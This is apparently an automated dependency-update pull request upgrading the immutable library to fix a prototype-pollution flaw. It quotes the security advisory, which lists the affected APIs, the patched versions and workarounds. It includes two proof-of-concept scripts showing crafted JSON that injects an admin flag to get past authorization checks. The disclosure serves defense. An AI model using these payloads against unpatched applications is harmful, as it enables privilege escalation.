🚨 [security] Update immutable 4.0.0-rc.14 → 4.3.8 (minor)

[depfu]

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ immutable (4.0.0-rc.14 → 4.3.8) · Repo · Changelog

Security Advisories 🚨

🚨 Immutable is vulnerable to Prototype Pollution

Impact

What kind of vulnerability is it? Who is impacted?

A Prototype Pollution is possible in immutable via the mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject() APIs.

Affected APIs

API	Notes
mergeDeep(target, source)	Iterates source keys via ObjectSeq, assigns merged[key]
mergeDeepWith(merger, target, source)	Same code path
merge(target, source)	Shallow variant, same assignment logic
Map.toJS()	object[k] = v in toObject() with no __proto__ guard
Map.toObject()	Same toObject() implementation
Map.mergeDeep(source)	When source is converted to plain object

Patches

Has the problem been patched? What versions should users upgrade to?

major version	patched version
3.x	❌ No fix will be provided. Please upgrade to a more recent version (v4.0.0 is four years old now !)
4.x	4.3.7
5.x	5.1.5

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

• Validate user input
• Node.js flag --disable-proto
• Lock down built-in objects
• Avoid lookups on the prototype
• Create JavaScript objects with null prototype

Proof of Concept

PoC 1 — mergeDeep privilege escalation

"use strict";
const { mergeDeep } = require("immutable"); // v5.1.4
// Simulates: app merges HTTP request body (JSON) into user profile

const userProfile = { id: 1, name: "Alice", role: "user" };

const requestBody = JSON.parse(

'{"name":"Eve","proto":{"role":"admin","admin":true}}',

);
const merged = mergeDeep(userProfile, requestBody);
console.log("merged.name:", merged.name); // Eve   (updated correctly)

console.log("merged.role:", merged.role); // user  (own property wins)

console.log("merged.admin:", merged.admin); // true  ← INJECTED via proto!
// Common security checks — both bypassed:

const isAdminByFlag = (u) => u.admin === true;

const isAdminByRole = (u) => u.role === "admin";

console.log("isAdminByFlag:", isAdminByFlag(merged)); // true  ← BYPASSED!

console.log("isAdminByRole:", isAdminByRole(merged)); // false (own role=user wins)
// Stealthy: Object.keys() hides 'admin'

console.log("Object.keys:", Object.keys(merged)); // ['id', 'name', 'role']

// But property lookup reveals it:

console.log("merged.admin:", merged.admin); // true

PoC 2 — All affected APIs

"use strict";
const { mergeDeep, mergeDeepWith, merge, Map } = require("immutable");
const payload = JSON.parse('{"proto":{"admin":true,"role":"superadmin"}}');
// 1. mergeDeep

const r1 = mergeDeep({ user: "alice" }, payload);

console.log("mergeDeep admin:", r1.admin); // true
// 2. mergeDeepWith

const r2 = mergeDeepWith((a, b) => b, { user: "alice" }, payload);

console.log("mergeDeepWith admin:", r2.admin); // true
// 3. merge

const r3 = merge({ user: "alice" }, payload);

console.log("merge admin:", r3.admin); // true
// 4. Map.toJS() with proto key

const m = Map({ user: "alice" }).set("proto", { admin: true });

const r4 = m.toJS();

console.log("toJS admin:", r4.admin); // true
// 5. Map.toObject() with proto key

const m2 = Map({ user: "alice" }).set("proto", { admin: true });

const r5 = m2.toObject();

console.log("toObject admin:", r5.admin); // true
// 6. Nested path

const nested = JSON.parse('{"profile":{"proto":{"admin":true}}}');

const r6 = mergeDeep({ profile: { bio: "Hello" } }, nested);

console.log("nested admin:", r6.profile.admin); // true
// 7. Confirm NOT global

console.log("({}).admin:", {}.admin); // undefined (global safe)

Verified output against immutable@5.1.4:

mergeDeep admin: true
mergeDeepWith admin: true
merge admin: true
toJS admin: true
toObject admin: true
nested admin: true
({}).admin: undefined  ← global Object.prototype NOT polluted

Resources

Are there any links users can visit to find out more?

• JavaScript prototype pollution

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by 4 commits:

• 4.3.8
• Merge commit from fork
• fix new proto key injection
• fix Prototype Pollution in mergeDeep, toJS, etc.

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)